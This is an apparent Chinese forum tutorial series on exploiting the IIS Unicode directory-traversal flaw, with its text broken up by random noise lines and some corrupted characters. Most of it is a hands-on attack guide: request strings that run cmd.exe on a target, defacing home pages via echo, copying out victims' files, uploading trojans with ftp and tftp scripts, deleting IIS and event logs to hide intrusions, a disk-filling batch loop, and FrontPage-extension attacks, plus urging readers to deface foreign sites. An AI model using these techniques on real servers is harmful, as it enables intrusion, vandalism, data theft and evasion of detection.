7 {# Z8 U+ X# V8 B8 {" k2 a+ H
此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1, 中国台湾繁体中文也同样存在这样的漏洞。
# N* u+ O( x5 Z
/ S8 M: V& N( h+ _* }& u/ `
中文版的WIN2000中,UNICODE编码 存在BUG,在UNICODE 编码中
0 h8 V2 ?% F; c0 f
2 f) Q! a' E5 L
%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
3 j5 D' O N# Q1 Y2 F' I
; \: i+ y, ~& a% Z1 h
%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'
0 {4 @8 S" \, ?
( j, ~3 T: X( U$ u
在NT4中/编码为%c1%9c
' _ v- E# b$ t5 K7 }2 R
7 f/ `1 f4 J' P5 F0 l) L5 w
在英文版里: WIN2000英文版%c0%af
/ `9 T* ~; i$ a& g
3 ]4 J7 j" {0 f/ ^( C( t
在中文win2k里:%c1%1c
% l$ R. _! V' E* k( b4 x: c6 l
, z8 q2 Y6 p2 K
此外还有多种编码,不一一阐述。
$ A$ w5 \9 [' i) ]& p) w
: `( g1 _) N+ y" N' {' m% Y1 Q1 X( e7 g
本文例子均以win2k为准,其他类型请自行替换。
3 i9 p. A+ O. d
! ^! e/ a* y' M1 n0 \
基础知识(3)
% ~1 A7 O* A: w
% t6 |) X8 ?' q5 w
% y! d: h1 e4 ~4 E4 o+ D
二,一切从基础开始
- q+ I* |4 Y9 \0 q
/ n) |5 ]9 a r! |7 m. }- r
由于wi t\system32\cmd.exe的存在,使远程执行命令变为可能,在浏览器里输入以下请求:(假设11.11.22.22有漏洞) e+ v3 R1 c! F& l
) S6 @' t9 ~' d9 A& o
11.11.22.22/scripts/..%c1%1c../wi t/system32/cmd.exe?/c+dir
4 a# W& Y' y7 R5 P: z4 R/ E
% W& D) e1 Z+ K6 l7 R) U
学过dos的应该可以看懂,其实就是利用当中的非法请求使我们可以连到system32下,如果inetpub\目录不合wi t同盘,或者目录级数有改动,可能会引起请求失败。 G, u! L/ J6 Z6 A q' Z$ w4 ~; n4 S- v0 Z
如果成功,那么在浏览区可看到如下信息:
. n5 E$ L Z3 G& g) k
/ R" {1 s! Q! H' r. D' C
Directory of C:\inetpub\scripts
6 R# p! d/ N! ~# n7 f; y3 m
* b) h6 E: j' M9 |2 U$ E
2000-09-28 15:49 〈DIR〉 . + [* |% S/ J* R+ F* D) ?3 n
9 K0 s: |4 r, _2 _: G
2000-09-28 15:49 〈DIR〉 .. (假设目录中没有文件,实际上有一大堆)
* O8 N7 E# _) e9 y5 s8 F
' V1 a9 m J/ n* P
是不是有自己机器的感觉了,正点!就是这种感觉!
$ F L0 v2 R3 y. O! V7 M
% v& ~$ a! g( G6 Y0 O8 l" P
cmd.exe相当与dos里的command.com,因此,我们可以执行很多命令了!
* H) p: d. ?, [$ a# h; Q
5 L1 t. G9 v$ X
... em32/cmd.exe?/c+dir (这个命令同样道理)
5 B! q. _# v/ K2 p/ }
: {+ c N* H; ~( x) i7 Z! c4 c0 g0 `* U
大家请注意:/c后面的+,实际上,他就是空格,请记牢!dir开始就是dos命令了,我们可以更改一下:
, Z6 R' D3 v! E( H: ~8 m8 h) @
, I' |$ I6 M5 ]7 [$ S/ j; R! f
11.11.22.22/scripts/..%c1%1c../wi t/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\wi t\auto.exe
- n( E2 j# o+ |0 n/ C+ c o- o
9 m' M& d# T8 p. k
会dos的朋友一定懂其意义了,不懂的请去看书 .
) c& r# C: ~6 |
/ x" d5 U5 [# D3 S- S3 Z
不用说,大家也知道我们就可以利用它来对有漏洞的机器展开攻击了!
( F( O# Q3 P+ j! {- D
+ R. j# C" g8 I: E# _
三,实战演练
) c, m5 O* w1 Z- U* y- s$ b
$ E+ N; G6 T: k) O4 G% g8 Q
1,修改主页!(是不是很爽?)
0 }2 A; e/ c% Z. K: o ]
+ i2 H* z( N% L
一般主页位置在c:\inetpub\wwwroot下,但要是改了路径,就需要找找了。
) @1 A- {' c % @0 f0 Y* @
5 t. j: d8 x' Q
最方便的方法:在浏览器里输入
要是有漏洞,那在浏?..皇俏颐堑氖籽 ?/a
- h' a; a2 H6 p) ?# V' o1 N; \6 g
) b0 ?& ?/ k. W8 c3 L- l
分析法:用dir看各个盘符的根目录,看可疑的就进去看,运气好的在一分钟里找到,这要看运气和直觉。
7 V( N# ]0 `* k' _% c
+ [7 A. z1 j# U* ]: R. b3 y
dir/s法:首先在看其主页,找个图片或连接,看它的文件名,比如,11.11.22.22首页上有一幅图片,右击,属性,看到了吗?iloveu.gif,然后我们利用unicode输入这条命令dir c:\iloveu.gif /s意味着查找c盘下所有目录里的iloveu.gif,注意实际应用时别忘了把空格改为+,如果没有继续找d盘,很快就能确定主页目录的。
' w8 n/ N7 f) O$ H& b
- i0 C6 M4 r; C2 ~* h
找到了目录,就要对它开刀了!一般默认收页为index.htm,index.html,index.a ,default.htm,defautl.html,default.a 中的一个,现在我们确定11.11.22.22中为index.htm
2 ^3 C* Y7 m% N' D, _: \
% N# u3 e" a' f6 D @
那么我们就修改它吧!
! i3 T' Z( T* U `) Y% V6 H" W
' K& R; x. F
最方便的方法:echo法。echo是一个系统命令,主要用于设置回应开关,而echo cshu c:\autoexe.bat就是把cshu加入autoexec.bat里并删除原有内容,echo cshunice c:\autoexec.bat就是加入cshunice但不删除原有内容,这样我们就可以逍遥的改了。 % Q* @$ ~ S; E8 A
! a& _2 L- R5 Y- ^6 c$ y
11.11.22.22/scripts/..%c1%1c../wi t/system32/cmd.exe?/c+echo+hackedbycshu+c:\inetpub\wwwroot\index.htm
& }, V$ r1 G2 h, R6 H0 T6 i
7 Q$ \- O4 f) f8 u9 m+ z
回应为:HTTP 500 - 内部服务器错误
7 `6 k% L+ T3 [& j5 P4 e& M# q
: @2 V" w7 a$ o% T1 l8 w7 L
通过对cmd的分析,袁哥得出一条简便的方法,加入符号
, M4 z2 i, a3 j( }& I2 M* T
4 M, @* I! G: r7 L
11.11.22.22/scripts/..%c1%1c../wi t/system32/cmd.exe?/c+echo+hackedbycshu+c:\inetpub\wwwroot\index.htm
/ d7 c' @- t* d" \ t3 [ _. Q1 F" ]& Q* a6 s$ H" u2 R0 e
11.11.22.22/scripts/..%c1%1c../wi t/system32/cmd.exe?/c+echo+2001730+c:\inetpub\wwwroot\index.htm [: X! F, u' E/ y* ~/ B
% z5 |: f; ^- m( I
回应为:cgi错误,不用理会
; X+ t4 O' {8 l4 W; J, t3 c) E
5 F& s. r- K1 @" Q% p% c
两条命令一下,呵呵,再看看11.11.22.22,是不是烙上我们的大名了?不错吧
1 {: M, ^4 F( Q {
4 [2 i9 k. H: V. U) I* \5 E
而在实际操作中,可能袁哥的方法也会失效,这时,我们就可以copy cmd.exe 为另一个exe,记住路径,用copy后的来echo
" M$ w+ F+ M: G8 P
- M3 p6 L7 p2 W" j. X! p+ Q4 \
例如:11.11.22.22/scripts/..%c1%1c../wi t/system32/cmd.exe?/c+copy+cmd.exe+c:\a.exe
) w' I2 h! c+ K' g
0 n, t% Q8 ]5 F& U
11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+c:\inetpub\wwwroot\index.htm
' Q% h* _3 D: E# X5 B9 N+ I' l! l
/ b/ R& k X' {6 E. ~ G
2,上传法:echo有点不讲道理,把人家的文件破坏了,要是想在主页上增光添彩,那就应该用改好的主页
当前离线
81888 帖子
624 精华
3287 阅读权限
90 在线时间
10 小时 注册时间
2006-9-4 最后登录
2010-6-5 TW技术CTO
624 精华
3287 最后登录
2010-6-5 发表于 2007-10-9 15:14
基础知识(4)
2 a; ^3 }, y; j) W, _
* ]8 ]" }5 j8 O) v6 t5 _, ?5 v
2 ?3 F" ]1 _: v, A* ]
上传,这个我们后面介绍。
# \0 W5 J5 I L% h( y- B3 V# t
& T' v( W4 H# C
几点忠告:
# g2 C: I# Z4 q1 l* Q
6 F: |4 B4 S2 w. Q8 T3 a
1,对于没有主页的机器(就是正在建立的主页),不要改它,这很没水准,也很没道德
; E; p, N" T |
9 r9 ^+ f8 U$ L
2,echo前记得帮他们做好备份
1 o- B+ r/ `6 l' l6 Z# h6 R% S
( ^- X3 G2 q6 \! b3 }; y
3,不准在主页里加入恶性语句 r$ L3 C# @) ^# S$ g
; B/ {/ |. s( ^. K/ t
2,下载文件
' S, c8 K- @5 i: w% g8 [
, A8 M# j" C+ U6 h
要是有什么有用的文件被你发现,那我们如何下载呢?
6 j0 I) e! S& |% S, Z' U
: G8 ^! i2 E1 l( g& c ~3 r+ ?
最简单的方法:把文件copy至网页目录下。copy c:\email\baby.eml c:\inetpub\wwwroot\baby.zip,然后,下载11.11.22.22/baby.zip就行了,注意!实际应用中要记得对文件名进行修改,总之不能暴露。
4 ? v3 T6 m4 z' Y
: t! r+ l" ]7 x; [" n
别的方法:对不起,没想好:)
* q' L/ k; q! H' p5 T
, U3 c- V: D( R+ H
3,最重要的上传
+ X+ q+ L( J! m7 K: ]5 C+ U
" p+ ]" v# b/ m' ~0 w) n/ a) a- D
一般方法:ftp法
) U% Q) v2 {; {: m1 w6 \
$ _$ M9 Y. r! P( J" u" |
首先建一个ftp脚本文件:c:\hehe.haha(名字乱取把),申请一个ftp账号,然后用echo吧
! D& x) W: U$ K
2 s, u0 R% I) q5 e
echo+open ftp.cshu.com(ftp主机) c:\hehe.haha
/ c& H: o; [6 |* M1 [# t
6 k, e6 ^5 Y, c" ~+ M
echo+user yourname cc:\hehe.haha (yourname是用户名)
' u9 J2 z9 r. B7 x
- F8 |2 H0 c c/ |
echo+yourpa wd c:\hehe.haha (yourpa wd是密码)
# g* L# j/ _4 J9 k, b# o1 q* k
* [- U7 @, x O8 @2 ~! }
echo+get setup.exe c:\hehe.haha 要下载的文件
$ B! ^5 O: i' A5 r. G
1 g2 Y4 ?; H$ b7 ?
echo+quit c:\hehe.haha
: p+ T! ]0 @( f4 n' e( D9 O0 \6 F
+ D+ c" v9 P* q1 D4 ?
完了以后:ftp+/s:c:\hehe.haha,由于是ftp主机,那么速度一定很快,过一会setup.exe就会出现在当前目录了(也就是cmd所在目录)
! J- q9 l1 l& {$ e+ i h# l( ~
& X. h4 a) N% C; x, H( v) ?
别忘了先上传到ftp主机,不要做马大哈哦!
6 z6 c! w# [$ E% H1 N7 ?+ h1 y
7 J( F! B& D3 E
最简单的方法:tftp法。
: E. g, |/ q9 _, z. k6 h
, W2 Z, X! b! E4 h8 Y/ j8 _7 N
这种方法不用中转服务器,首先准备一个tftp服务端,它的作用就是把你的机器做成一个tftp服务器,利用漏洞机器来下载(注意,运行tftp时不要运行其他的ftp软件)
4 B* _) r' W; K' d5 _$ u! Z+ l
, N& Y" L) {6 [, s0 _
在这里我推荐cisco tftp server,自己去找找把,实在没有来找我:)
& y! X, R' ^4 ~$ V" b
4 ^& Q* b' B8 L0 F+ v. v! V, E" ^/ U/ q
***好后运行,别忘了设置好默认目录,否则会找不到文件
% `3 {5 B$ S S% l0 f. r
8 R* t' P% ]2 m
tftp命令:tftp -i 1.2.3.4 GET ihateu.exe c:\wi t\ihateu.exe(ihateu.exe在默认目录里)
4 B! h) z* ?# o9 ~
9 t% Y m9 I: i1 {2 [9 B
1.2.3.4为你的ip,用unicode运行一下,会看到tftp server里有反应了,这就好了,不一会,文件就传上去了,方便把!
- F! s! ?& W. y0 @- u
" j7 K+ E. p0 }0 h0 X- j8 T4 p
学会了上传,我们就可以好好改主页,还可以上传木马,还可以把程序放上去运行…………(运行程序和在dos里一样)
! Y5 R& m, I* Y$ J
/ P. n( H K6 S/ t: G% c% G3 @, \
4,如何清除痕迹
* l; e2 W, S7 U( N. q
5 n! B ]9 X% I3 u( v
虽然国内主机纪录ip的不是很多,但万事小心为妙,unicode权限达不到admin。用cleaniislog行不通,就…………直接删吧!
# o& W8 t, \2 T4 p$ }, B
* }& N& `8 a. z! N9 a8 D0 D. G* [
C:\wi t\system32\logfiles\*.* f5 H0 Z- p6 S
( V3 W3 w. |- R6 t8 m# P0 V
C:\wi t\ ytem32\config\*.evt
$ o2 x) r% ~* o8 M$ i
1 V! p5 j0 X& _: _- W3 m
C:\wi t\system32\dtclog\*.*
8 e, a0 X) J# y' I7 g8 T _2 y' u5 j1 e2 `) c2 q' d
C:\wi t\system32\*.log
: w1 P4 c8 J9 i Z; F/ o
( p( j1 `7 z$ M, A8 o
C:\wi t\system32\*.txt
4 h$ C( i8 \6 @) @9 M2 b
% S3 e. t O- X" k9 f) x' Z# Q
C:\wi t\*.txt
! L5 v" y) O- _( p
, U7 d7 I% G, i+ g4 g
C:\wi t\*.log
" F6 t# ?0 a1 h6 V8 K* ~ F e o- i" g* G2 _5 H; p
全……擦掉!
4 _3 w; C1 s% U; Z+ W( A. j) I
( d" l9 z# s" h; }/ u
四,细节问题。
% I9 z& u4 F2 W$ S, s+ M# C, @0 r
" X$ T- t' Q* p: `- @1 d( s2 y6 N
1,遇到长文件名怎么办?
& V/ T9 L9 K1 u6 P) s* W+ l8 p l; r, F5 z( |9 ]8 C7 i- s
c:\program files\
* E9 w K1 T1 F0 D' \9 E
" v. L. |& p+ T+ f; e
就用c:\" rogram20%file quot;\
% }7 j! G3 M( ]6 @+ z4 O* X! f
; y$ [! r' g" p) F0 j7 o, F
2,遇到空格怎么办?
7 u, H" V, w% d! R1 G
%代替喽,或者xx yy=xxyy~1
" V/ _& k4 M% E( E1 F
基础知识(5)
6 P5 |! B. G* d9 s3 {* ^
* v) M) q; l# |( l0 C
: ]1 T" k8 s% W- ?: k
%代替喽,或者xx yy=xxyy~1
' ^& O; l/ Y- o7 X( g
" u& G+ Z, t4 G0 Z5 Y* d q
3,如何做个很大的文件?
9 a. F% \1 _) I& h0 y
7 z. [9 w( P+ g3 h3 D
目的就是破坏啦!我不喜欢不过教教你们啦
7 }/ ?! ?- K$ h" c4 z
9 ?. H1 y4 L! I( ]
@echo off
* x. e+ Q- ]- I' J+ i& _
/ s' p+ E1 g2 Y, d
echo big c:\a.a
6 T. H4 h3 s9 z- f% T
* M: T* @+ C; w7 t1 z- t( x
( K W5 A. P( A% S! u4 w V! b% I8 W }2 G2 h. r" ?
copy c:\a.a+c:\a.a c:\a.a
- Z; _' V# \: Y$ v9 s3 \
9 a( M& i4 X: m/ U
goto h v; x9 h6 S3 t* K- B% {
1 o+ L) r+ P) n. F
注意不要乱来啊!
. ]6 O$ j) f6 S9 i) Q
: c# F8 Z3 C) K* p0 y# l
4,输入命令,没反应或反应不对。
: O; u3 C( y/ K* M/ L4 ]
' n+ \" Z , X3 I: q
:)请检查检查再检查命令的正确性,可能没有漏洞,那就闪人!看在你看到这里那么给我面子的份上,在给你几个吧!
9 g% P: q, q( j% Y/ v
# G/ Y0 W! Z1 P, m2 Q5 k
... macr;..&am Agrave;
9 _5 v$ W& h0 A, z" [7 i- F& i
../wi t/system32/cmd.exe?/c+dir+c :\ 或
... 2/cmd.exe?/c+dir+c:\ 或
... 2/cmd.exe?/c+dir+c:\ 或
... 2/cmd.exe?/c+dir+c:\
1 E! l7 c7 I5 A" h1 X
& p: _" U0 \; c; U/ t: H. g+ d
不一定有用哦!
% ]1 d' e9 A7 Y* ? a! V U( U4 s% g) k4 k
3 t2 G/ \7 j5 k! F1 w
5,如何找到unicode漏洞的主机
. i4 ^$ E' A3 N$ }$ @
2 e! t! ]1 p% o- Z. _6 Z c
呵呵:)最好的方法自然是………………一个一个ping,一个一个试喽:)
3 f3 U. c/ X0 b
, b# Q, K k/ i5 a- d
不要打我呀!我说我说。最好找一个cgi扫描器,unicode查找器多如牛毛,随便找个吧!
: E% b2 ]. @0 n! B
5 X/ U. D6 ^, A
6,我copy,del文件,怎么显示acee denined?
( W3 ?1 A/ c# `. A( D
0 Q3 ~% ~: ~: d* {, s) R& m
这个不好办了,由于unicode所拥有的权限有限,出现上述情况很正常,我们要做的便是提高自己的权限!
- ]) L; u: _8 b! z! {
7 |8 j" T$ C" g+ ]0 L
这个我会在今后介绍,现在你可以试试attrib
. m2 _1 S$ r 5 I( n8 q* ~6 g, V) g$ {3 Z
attrib -r -h -s c:\autoexec.bat
" u. k5 c/ b6 X) y7 c \
; o/ K1 i$ V7 G0 N9 k
再对autoexec.bat进行操作,看看有没有效果,成功率不高,不好意思! r5 w( K/ u& o9 } v r8 Q
# t/ y0 H( {' M, v6 ~" E# [, n
7,我黑了主页,天下无敌?
* ` J8 i( G1 Z7 s' @+ E+ }
% g% _- V& A0 I" B+ `, z
我本来想对你说:“见你的鬼去吧!”不过想想不大礼貌,有失我绅士风度,所以改个口
% ~$ ^9 w3 x1 @8 P: f5 Q' i. t2 S
5 y7 m3 F/ m, ?( S9 t
echo主页或改主页在不懂黑客的人看起来很了不起,不过,它最多算是一个基础,拿到admin才是我们的终极目标!
; j/ u& r2 }* H# J( c9 I
1 t& X4 j8 l1 B* P* E
对cshu全体成员来说,不准去改正在建立的网页!这是我们的原则!
, N3 h1 A' T' }1 J% I1 X% x) |
4 t+ P+ j8 c2 r. }
要是你想耍耍威风,那也可以理解,那就去黑外国的,或者url欺骗也是个好选择
0 E# u* s( g. Q( {
( y1 P# |5 E/ x' P3 [$ H/ _8 ]* P
8,我如何做更多的事?
; p* s0 B/ p: Y/ s+ }4 R
2 I+ Z* m/ U/ u6 _
第一,努力提高权限
1 A, o' N/ u( g' \9 p* f* Y
; {, d# V1 |5 y+ o
第二,由于cmd的限制,我们可以做的不多,那就要程序帮忙,上传吧!切记,要隐秘!
8 a. R- ]6 J3 w/ Z% U
: j3 Y5 n6 O% u6 i
1 k% {% E3 y' d! W& I4 b
一,frontpage扩展攻击。
+ r" O, T! J! R6 B) k7 R
* i5 T9 }" |9 f) E3 j. Y
为什么把它放第一位呢?原因很简单,它最最方便,frontpage服务器扩展是一种方便的远程站点管理功能,可是由于某些网管注意文明用语的疏忽(为什么注意文明用语满街飞?)不设置访问密码,如果那样的话,我们只要用一个frontpage就可以黑它了!!这完全不是黑客工具,但它确实办到了,还要感谢注意文明用语网管和微软啊!
5 b4 i, ?6 k. l( p4 t6 N
4 o+ |! D; [- ~. f" b0 t' h
具体做法:
/ a9 [6 d M( k; }
' \, O/ j& g3 H( P" v
1,准备frontpage,我是用dreamweaver的,但它不能黑啊:)最好是2000版,只是不要是老掉牙的版本就行了。
6 G% L; \2 [7 ?$ i+ u
% @/ }$ V/ m1 E: i* M
2,找一台有frontpage扩展的主机,可以用流光,也可以用搜索引擎查找/_vti_pvt/,这是frontpage扩展的标志。
/ M6 O4 z; Y8 V
2 u% _3 W; I% B* J
3,接下来打开frontpage,(妈妈:你在干什么?回答:做网页!妈妈:好孩子!)文件菜单下选择“打开站点”,然后在文件夹框里写入
(我习惯用这个做例子,以...僮魍?澄募?薥
当前离线
81888 帖子
624 精华
3287 阅读权限
90 在线时间
10 小时 注册时间
2006-9-4 最后登录
2010-6-5 TW技术CTO
624 精华
3287